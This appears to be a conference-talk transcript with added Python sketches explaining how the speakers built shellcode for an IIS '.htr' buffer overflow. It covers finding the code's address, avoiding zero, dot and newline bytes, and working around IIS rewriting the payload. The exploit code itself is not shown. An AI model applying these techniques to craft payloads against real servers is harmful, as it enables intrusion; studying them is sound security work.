Those are constants from the Win32 API that say you want to open the file in sharing mode, that you want to create it if it's not there, and stuff like that. Well, you have to read it the opposite way. You see the call instruction, the first one, where open is written on the right side. This is the function call, and what we do above it is put the parameters on the stack. This is how NT wants to see the parameters of a function. Other systems do it differently, but in that case we just, well, we don't know what the parameters actually mean. No, we do know; this is explained in the Win32 API. One thing you might have noticed is that the order in which we push them on the stack is the reverse of the API definition; it is the other way around from how the parameters look to a C programmer. This is because the NT calling convention states that you have to put the arguments on the stack the wrong way around. This is documented in a manual somewhere, or you just have to know stuff like that. You can see it if you read the code that your compiler creates, or it is documented in manuals about writing assembly language for Windows. I know that there are not many manuals, almost none, that explain how to do assembly language on Windows, but a few of them exist, and you should try to get hold of one to help you while experimenting. So what we do is push some constants on the stack and then call the operating system. This offset is static on most NT systems, but if someone installs Service Pack 6 or Windows 2000 or whatever, this offset will be something else. So if you wanted to write really good shell code, you would add code that tries to find this offset by looking at adjacent places and searching for the code. But as far as I know no one has actually done that, because you are happy when it works on your system, so that you can post a message to Bugtraq and be famous.
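The reversed push order can be modelled in a few lines of Python. This sketch assumes that the call on the slide corresponds to the Win32 function `CreateFileA`; the talk does not name it, so treat that as a guess. The parameter order and the constant values come from the Win32 API, while the file-name address and the helper names are invented.

```python
# Assumption: the function being called is CreateFileA.
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 2
FILE_ATTRIBUTE_NORMAL = 0x80  # 128

ARGS_IN_C_ORDER = [
    ("lpFileName", 0x00401234),             # hypothetical address of the name string
    ("dwDesiredAccess", GENERIC_WRITE),
    ("dwShareMode", 0),
    ("lpSecurityAttributes", 0),
    ("dwCreationDisposition", CREATE_ALWAYS),
    ("dwFlagsAndAttributes", FILE_ATTRIBUTE_NORMAL),
    ("hTemplateFile", 0),
]

def push_sequence(args):
    """Order in which the caller pushes: last C argument first."""
    return list(reversed(args))

def stack_top_first(pushes):
    """The x86 stack grows downward, so the last value pushed ends up on top."""
    return list(reversed(pushes))

for name, value in push_sequence(ARGS_IN_C_ORDER):
    print(f"push {value:#x}  ; {name}")
```

Read from the top of the stack, the callee sees the arguments in the same order as the C prototype, which is the reason for pushing them backwards.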
So we have to open the file, as I said, then we have to write something to the file, and then we have to close the file. Actually, closing the file is not that important, but on some systems, when you don't close the file, you cannot be sure that the data is actually written to it. So we do it here because we want to be a good example for you; you should always close your files. And the last thing we do is tell NT to exit the current process. If we just wrote nothing there, the CPU would try to interpret the HTML code as instructions, do something completely bullshit, and then crash and burn. You would probably see in the event log of the NT system that the IIS process crashed, and this looks like a bug, or maybe you would suspect that someone tried to break into your server, but either way it's something that's visible. Someone tried some time ago to write shell code that would, at the end, start a process that restarts the one you just crashed a few seconds later, so that nothing actually happened except an outage of a few seconds on the system. But there's no documented shell code that actually does this, so we leave it as an exercise to the audience. Okay, this code is the assembly version of a working piece of code that would create a file. If we assemble this and look at the binary form, we recognize some things that are contrary to the requirements. For example, all those push zeros. These are the obvious places. Yeah, this is something we understand because it is straightforward; this is the straightforward assembly to create a file on NT. And obviously, if you push a zero, you get zeros in your code, so you don't want that. A binary zero in the shell code would mean we cannot put it into our URL. Oh, one other thing. You see here that we push the offset of string or the offset of message, but I told you before that we don't actually know the position of our code.
So one thing that should be conceptually clear now is that we have to find a way to know where we are. As I told you, all calls are relative on Intel, and when you call a procedure, the position right after the call is put on the stack. So what you would do is this code: we just call the position right after the call, which puts the address of this piece of code on the stack, and then we get it back with POP. This is the obvious code to get the current offset. But as I told you, the target of the call is encoded as a difference, and here the difference is zero, so we have another zero. It is less obvious, but this is the kind of problem you will encounter all the time when you write shell code, so you might as well keep it in mind now. You can also see in the first message line that there are some strings, and in the www address there are no dots where there should be some. They are not allowed if you want to have successful shell code. So why are they not allowed? Because we exploit the file name part of filename.htr. That means the HTTP request looks like this, and it works like this: you connect to foo, the machine foo, port 80, and then you send the request with the file name and some other crap. So this part has to be our buffer, because the extension is counted from the first dot. This is IIS-specific, of course.
This is something that does not happen with all overflow exploits, but something like it has to be worked out for each buffer you want to overflow. To be honest, we didn't realize it at first, because what you do is just write code and put it in the buffer, and then you see it doesn't work; it doesn't even trigger the overflow. If you have a dot in here, IIS takes the characters after the first dot as the extension, and that will probably not be .htr. So you have to avoid periods in the shell code too, and periods can of course occur not only in the binary code of the assembled instructions but again in offsets. So, one obvious thing if you want to get a zero on the stack, like push zero. Pretend that we have only four digits in each number now, because I'm tired of writing all this. So this is an obvious way to get zero in EAX, and then we simply push it. This code is equivalent to the original push zero, but it doesn't contain any zeros. These are the kind of things we will do to the code to get rid of zeros, and not only zeros: end of line is prohibited too, and dots, as I said, and we noted a few other things we will explain later. Yeah, you have to start applying a few tricks to your code. But these are not conceptual hurdles. No, the working code is there, you can see it, but now you have to start making changes to avoid zeros, to avoid dots and all that stuff, and this can be quite time consuming because you always have to test it. So in case we intimidate you and you think we are wizards: it took us a few hours and something like 200 tries to convert this code into a form that does not contain any zeros.
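To see why the replacement for push zero helps, one can compare the machine-code bytes of a few candidates against the prohibited characters named in the talk (zero, dot, end of line). The Python sketch below is a hedged illustration: the opcode bytes are standard 32-bit x86 encodings, but the exact instructions on the slide are not known, and the helper name `violations` is made up.

```python
# Prohibited bytes named in the talk: zero, dot and end of line.
FORBIDDEN = {0x00: "NUL", 0x2E: "dot", 0x0A: "LF", 0x0D: "CR"}

def violations(code):
    """Return (offset, name) for every prohibited byte in the code."""
    return [(i, FORBIDDEN[b]) for i, b in enumerate(code) if b in FORBIDDEN]

CANDIDATES = {
    # push 0 (short form): 6A 00
    "push 0": bytes.fromhex("6a00"),
    # mov eax, 0x01010101 / sub eax, 0x01010101 / push eax
    "mov/sub/push": bytes.fromhex("b801010101" "2d01010101" "50"),
    # sub eax, eax / push eax
    "sub eax,eax / push eax": bytes.fromhex("29c0" "50"),
}

for name, code in CANDIDATES.items():
    print(f"{name:24s} {code.hex():24s} {violations(code) or 'clean'}")
```

All three sequences leave a zero on the stack, but only the first contains a prohibited byte. Running a check like this after every change is a cheap way to catch the accidents the speakers describe before uploading anything.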
So the problem is that it's easy to shoot yourself in the foot on the way. Say you change something in your code, and somewhere before the part you just changed you have calculated the distance to one of the messages stored at the end of the code. If you insert a byte here, you might accidentally create a zero or a line end or a dot in that offset, in the difference. So even if the transformation you just did was right, you might have put in another zero, and this is quite difficult to find because all the feedback you get is that the server process crashed but didn't write the file. So conceptually, all you have to understand is how to get the code that's on the screen now. The rest is just fiddling with the bits to get the zeros out. Okay, and the hard work and the 200 tries of the exploit are seen here. Actually, one thing that is very good for finding problems is, just a second, excuse me. Just to make this clear: this is conceptually exactly the same code as before. It's a bit longer because of all the tricks we used, but it's the same code and does the same thing. So the first thing you see is the commented-out int 3. This is another peculiarity of the Intel architecture: historically, this is the debugger interrupt. If a debugger wanted to insert a breakpoint, it used to write int 3 there, and the Intel processor has a special opcode so that int 3 can be encoded in just one byte for this purpose. Nowadays you don't have to do that because you have hardware breakpoints with special registers, but debuggers still listen to interrupt 3. So if you have code that starts with int 3, the debugger will pop up once you run the exploit. This is quite funny, actually. You have to imagine me sitting at my NT server box, and something is triggered on my machine. I haven't touched anything, and the debugger just pops up because he uploaded some code to my machine.
I put this code in binary form and upload it, and because of the int 3 he can follow in the debugger, which suddenly pops up, what is going on. And maybe there's some stray zero we produced with the last trick, and so on. And this went on over 200 times, taking something like five minutes each round. So, as I told you, we have the problem that the offset of this call is zero. The most obvious thing to do would be to insert one instruction here, and it's no longer zero. This NOP instruction means do nothing, and it can be encoded as one byte; that's what most assemblers do. So the offset would be one. But call uses a four-byte offset, so what we actually have is not just one but a one followed by three zero bytes, so we haven't gained anything. One trick is that small negative numbers are stored with lots of one bits instead of zeros. So what we do is jump to temp two, which is two lines below, jump back, and then call. Then the offset of the call is negative, and we get the same result. This is the kind of code you will see in shell codes. It's not obvious what it does, but once you know the tricks, it's the same all the time. You make it jump there, and then, we can draw a picture. How does it work? Okay, we have it. We are somewhere in the code, forward means that direction, and we go back just a little, so the offset here is given in negative form, and as a number that starts with FFFF. So we did the same call to get the address, but we had to insert some garbage that really makes the code hard to read in the end, and it more than doubles the code size. So now we have the offset. The next thing is that, as I told you, the relative differences between the code and the messages, for example the file name, will be small numbers because the shell code is small, so we have lots of leading zeros again.
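The three variants discussed here (call to the next instruction, call over one NOP, call backwards) differ only in the four displacement bytes, which a short Python sketch can show. The offsets within the shell code are invented for illustration and `call_bytes` is a hypothetical helper; the encoding assumed is the usual `E8 rel32` near call.

```python
import struct

def call_bytes(call_offset, target_offset):
    """E8 rel32 for a call at call_offset (within the shell code) to target_offset."""
    rel = (target_offset - (call_offset + 5)) & 0xFFFFFFFF  # two's complement wrap
    return b"\xe8" + struct.pack("<I", rel)

variants = {
    "call next instruction": call_bytes(0, 5),   # displacement 0
    "call over one NOP":     call_bytes(0, 6),   # displacement 1
    "call backwards":        call_bytes(7, 2),   # displacement -10
}

for name, code in variants.items():
    print(f"{name:22s} {code.hex()}  zero bytes: {code.count(0)}")
```

Only the backward call is free of zero bytes, because a small negative displacement is padded with `FF` bytes rather than `00` bytes. That is the reason for the forward jump followed by a call back.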
One trick to avoid that is to take a number like this and add it to the offset we just calculated, and when we use the value we just subtract the same magic number again. That way we don't have zeros in the code; we have constants that contain no zeros. But this of course makes the code very hard to read. Oh, I have to apologize for the comments, which are in German of course, but they're not so important; we will tell you what happens. The next thing is the push zero. I told you how we do it. The first thing we do is, yeah, so now you can see my pointer. Okay, so what we do here: of course we can't just move a zero into the register we want to clear, so we subtract it from itself. Another way that is commonly found in Intel code is to XOR it with itself. This is done not only in shell code but on other occasions too, because this instruction is encoded in two bytes and the move needs at least four bytes for the zero constant. So this is actually common; even compilers generate code that subtracts a number from itself to get zero, and most people who have written assembly language before know this trick. So what we do here is add this magic to the constant. In hindsight it would have been better to use something other than one, because there's quite a chance that the sum will contain a zero again. This is the reason why there's a two in there: it happened to us. It was 01, 01, 01, 01 at first, but then some constant changed and the addition produced another zero at that position, so we changed it to two. So we experienced quite some pain putting this code together. The next thing we have to do is strip the dots from the messages. The file name can contain a dot, and the message we want to put in the file can contain a dot, so we put in an exclamation mark or some other character; it doesn't really matter which. So what we do here is patch up the messages.
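The magic-number trick can be sketched in Python as follows. The idea is to store `value + magic` in the code and subtract `magic` again at run time, choosing `magic` so that neither constant contains a prohibited byte. The candidate magics mirror the 01 01 01 01 and 01 01 02 01 patterns mentioned in the talk; the example offsets, the set of prohibited bytes, and the function names are assumptions made for illustration.

```python
import struct

FORBIDDEN = b"\x00\x2e\x0a\x0d"   # zero, dot, LF, CR
MASK32 = 0xFFFFFFFF

def clean(value):
    """True if the little-endian 32-bit encoding has no prohibited byte."""
    return not any(b in FORBIDDEN for b in struct.pack("<I", value & MASK32))

def masked(value, magic):
    """The constant that is actually stored in the shell code."""
    return (value + magic) & MASK32

def find_magic(value, candidates=(0x01010101, 0x01010201)):
    """Return the first magic for which both stored constants are clean."""
    for magic in candidates:
        if clean(magic) and clean(masked(value, magic)):
            return magic
    return None

for offset in (0x00000010, 0x0000FF10):   # hypothetical offsets
    magic = find_magic(offset)
    stored = masked(offset, magic)
    restored = (stored - magic) & MASK32   # what the code computes at run time
    print(f"offset {offset:#010x}: magic {magic:#010x}, stored {stored:#010x}, restored {restored:#010x}")
```

For the second offset the plain 01 01 01 01 pattern fails because the addition carries into a byte that becomes zero, which is the same kind of accident that forced the speakers to switch one byte of their magic to 02.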
In memory the message contains not a dot but an exclamation mark, and then we add code that overwrites it with what we wanted to have in that place but couldn't put there because the exploit wouldn't work. Now we simply do the same as before. We have state in here that's sometimes not obvious. In this line we put a zero in the EDI register, then we put the same zero in EBX. Now we push EBX to get a zero on the stack. Next we want to push 128, but 128 as a 32-bit constant contains lots of zeros too, so we do some arithmetic here. This is again tricky code. It looks like the one would be encoded with four bytes again, but for historical reasons it isn't. So adding something to a register like this does not insert a zero into the code. This is something you don't necessarily know, but you can see it by looking at the disassembly and at the bytes in the code. So this is actually a valid way to get rid of the zero. We increment by one, now ECX is one, and we shift it left seven times, and then we get this number. So we calculated it, and the way we calculated it didn't introduce any zeros. There are some opcodes that you can't use because the opcodes themselves contain zeros. Some forms of the add instruction are among them. So sometimes, if you want to add, you actually subtract a constant instead. It's really, really tricky to read in the end, but it's not so difficult once you get the point. Next we want to push this crappy constant, some brain-dead flag from an include file, and we have to calculate it again, of course. So first we push the two; we get the two by the same method we used here. Then we push the two zeros again; we didn't change EBX on the way. And now we have to get this number, which can of course be done the same way as here, just by shifting. The shift count is small, because the opcode can only shift by at most 31; the words are not bigger than that.
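The register arithmetic described here can be replayed in Python on a simulated 32-bit register. This is a sketch under assumptions: the talk only says that one constant is 128 and that the other is produced with a shift count of 30, so the value `1 << 30` used below is a guess, and `shl32` and `has_zero_byte` are hypothetical helper names.

```python
import struct

MASK32 = 0xFFFFFFFF

def shl32(value, count):
    """SHL on a 32-bit register; the CPU uses only the low 5 bits of the count."""
    return (value << (count & 31)) & MASK32

def has_zero_byte(value):
    """True if the value, written as a 32-bit immediate, would contain a zero byte."""
    return 0 in struct.pack("<I", value & MASK32)

ecx = 0                      # sub ecx, ecx
ecx = (ecx + 1) & MASK32     # inc ecx
ecx = shl32(ecx, 7)          # shl ecx, 7
print("ecx =", ecx, "| zero byte as immediate:", has_zero_byte(ecx))

flag = shl32(1, 30)          # assumed value; only the shift count 30 is from the talk
print("flag =", hex(flag), "| zero byte as immediate:", has_zero_byte(flag))
```

Both results would contain zero bytes if written directly as immediates, while the instructions that compute them carry only the small constants 7 and 30 in a single byte each.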
So the opcode does not contain three leading zeros here, because it would make no sense to encode such large shifts. That's why the count is simply one byte, and shifting by 30 does not introduce a further zero. Now we have to get the offset of string. What we did initially is calculate the offset of temp three and push it on the stack so that we have it later. You can see all this by just using a debugger on this code, but those are the main tricks you use. The rest is just that at some stage you get a zero in some calculated distance between the message and the code, and then it's the same tricks all over again. Okay, well, I guess you get the feeling for what is going on there. We have to use a few tricks to satisfy all the conditions we had before: no dots, no zeros, and so on. Oh, there's one more important trick. Yeah, well, this one. As I told you, the address we want to go to is static, but we can't call it directly, because that would mean encoding the relative distance, which we don't know because we don't know where we are, so we would have to calculate it. Another way is to put the value in a register and then call that register. I don't know why this instruction exists, because you don't need it most of the time, but it is a way to call a fixed address. Okay, so the first block you saw is exactly the same as in the previous file, where there were just pushes, push zero, push zero, push 128 and so on, and at the end the call of the actual function that creates the file. Then we go to the next function, which writes, and the next function, which closes, and you might expect that we are finished then. But no: the problem was that IIS seemingly randomly changed our code in memory. This is actually not documented at all; it's not in a single manual. We don't know the reason. You can take this assembly code, turn it into binary form, and check whether it meets the conditions.
If there are no zeros, no dots and so on, you're finished. Actually, we have a theory. Yeah, we have a theory about what happened, but let me finish saying what happened. We had binary code fulfilling all the requirements, but when we uploaded it to the server we could see in the debugger that some positions in the code were changed. Some new bytes were introduced, seemingly at random; others were erased. It wasn't really random, it was deterministic, but there was no rule we could guess. The theory we have is that NT stores the file name in Unicode and there's some translation going on, but it's just a guess; we don't actually know. Stuff like that can happen, and you have no chance of finding it unless you do the int 3 trick to get the debugger; otherwise you don't even know what happened to you. So if you really want to do shell code on NT, you have to get a decent debugger; there's no way around that. The next thing we did was guess that it wouldn't work if we had slashes here, because we have a slash here in the URL. Then you don't have the .htr extension that is used to trigger the overflow. And we wanted to write a slash to the file, so the text we want to write to the file was changed a little: we replaced slashes with this brace, we replaced dots with this exclamation mark, and we exchanged spaces with this. We found incrementally that IIS was changing different bytes and the exploit wouldn't even trigger, and then we just guessed and replaced another byte. That's why the pattern we used initially was just letters, because letters are rarely changed. Actually, we have never seen it happen. But opcodes can be anything, like the German umlaut ü or some other code above 80 hex, and that might also be treated as Unicode and then translated randomly.
So you have to have a debugger, and then you see that your code is changed, and you look at the byte that was supposed to be there but isn't now, and you have to re-engineer your code to not have that byte there. That is sometimes quite difficult, because it can be two instructions together that trigger it. We found that it was not just one byte that could trigger the change, because the same byte was not touched further up, so it was really sequences of bytes that triggered these changes. This is probably unique to this exploit, but we tell you so that you know: if it happens to you, it happened to us too. The changes were always the same, but they were not really understandable to us. So the problem is that we now have a completely wrong string in memory. We wrote a small piece of code that loops through the string; that was easier than calculating the offsets again and maybe introducing more zeros. So we just wrote a small routine that would reverse the changes we had to make. This is one of the changes. It is just a small piece of assembly code that steps through the string, reads each byte, and compares it to the substitute values we wrote instead. Of course this code might have contained zeros or other prohibited characters again, so you see why it took us 200 iterations to get the right code in the end. So when we called the first function, we got the file handle back, which is an integer, and we stored it on the stack. Now we have to use that value as an argument to the next call, the write call, so that NT knows which file we want to write to. So what we do here is fix up the registers again, and as you can see, the 01, 01, 02, 01 pattern didn't suffice in this position, so we added another 50, 50, 50, 50 and subtracted it again.
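The substitute-and-repair idea behind that small routine can be sketched in Python. Only the exclamation mark for the dot is taken from the talk; the placeholder characters chosen here for slash and space, the example message, and the function names `disguise` and `restore` are all hypothetical. The original routine was written in assembly and ran inside the exploited process.

```python
# Prohibited characters and their stand-ins. '!' for '.' is from the talk;
# '}' for '/' and '_' for ' ' are placeholders picked for this sketch.
ORIGINALS = b"./ "
STAND_INS = b"!}_"
REVERSE = dict(zip(STAND_INS, ORIGINALS))

def disguise(text):
    """Done offline: swap prohibited characters for stand-ins of the same length."""
    for ch in STAND_INS:
        if ch in text:
            raise ValueError("stand-in character already occurs in the text")
    return text.translate(bytes.maketrans(ORIGINALS, STAND_INS))

def restore(buf):
    """Done at run time: walk the buffer and put the real characters back in place."""
    for i, b in enumerate(buf):
        if b in REVERSE:
            buf[i] = REVERSE[b]

message = b"<a href=http://www.example.com/>hello there</a>"
sent = disguise(message)
print(sent)

in_memory = bytearray(sent)
restore(in_memory)
print(bytes(in_memory))
```

Because every stand-in is a single byte, the string keeps its length, so none of the offsets calculated elsewhere in the shell code have to change.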
This NOP was introduced because otherwise the last byte of this and the first byte of this triggered one of those Unicode conversions. So the code does no more than the code you saw initially, but it looks way more complicated. Next we call the write function, and we have to get the length of the message. Again, because the message is so small, this length is a number with three leading zero bytes. So what we did here is move zero into ECX, and there is an Intel idiosyncrasy that allows us to write just the least significant byte. Because we know it's zero, we don't add but we OR, because, as I told you before, one form of the add instruction has a zero byte as the opcode. So what we do here is OR those bits in, and the result is, where was it? Here it is. The result is that we actually have the string length of the message in ECX and can push it. Now the same thing we did before. Maybe one more minute. Another thing: you can imagine our pure desperation when we see that the code looks correct and doesn't contain any zeros but is still rewritten, as in this case, where the address of the NT function itself contained a byte that would trigger one of those Unicode things. We couldn't simply change it, because this address is static; you can't change it. So what we did is insert one instruction that doesn't do anything. EAX is zero in this case, and XORing with zero doesn't do anything, but this instruction inserts two bytes, and that made the rewriting go away in this case. Here again the same thing. Of course, XOR and OR do the same here, but as I said, a little variety in the code is more interesting, so this again does nothing. And we have to get a zero on the stack again. We want the process to exit, and this is the last thing this process does; ExitProcess never returns, so we can just put those numbers here.
Imagine our surprise when we found out that these were rewritten into a single backslash. What IIS did internally was convert the slashes to backslashes, because that is the path name convention under NT and MS-DOS. So it first converted our code to contain backslashes, and then it fused runs of more than one backslash into one. So not only did it change the code, it also made the offsets wrong, which we had calculated on the basis of two slashes being here. Yeah, imagine you have the whole thing in binary form, and there are some strings in it with two slashes, which are converted to two backslashes and then stripped down to just one. But then we no longer have the URL we want in the file. Unfortunately we don't have an NT server here, for security reasons obviously, so we can only show you this code, but we are going to put it on the FTP server and then you can try it yourself. You will need NASM to assemble it. It should work out of the box. Actually, this is just one part, because we found a wrapper on the internet. Some guy had written a generic exploit, so to speak, that takes care of calculating the offsets, the size of the buffer, and which bytes you actually have to overwrite. So we had a convenient wrapper that allowed us to specify just the code that should be executed, and as you can see, it was still work. We thought it would be a matter of a few minutes. We were wrong. This wrapper is not trivial to write, but if you know the trick with the pattern that we showed you initially, it's not that difficult. Well, the wrapper only opens a socket and writes this stuff, together with the HTTP protocol header, to the IIS server. You need some way to send the server the code. Okay, so that's it. Thank you.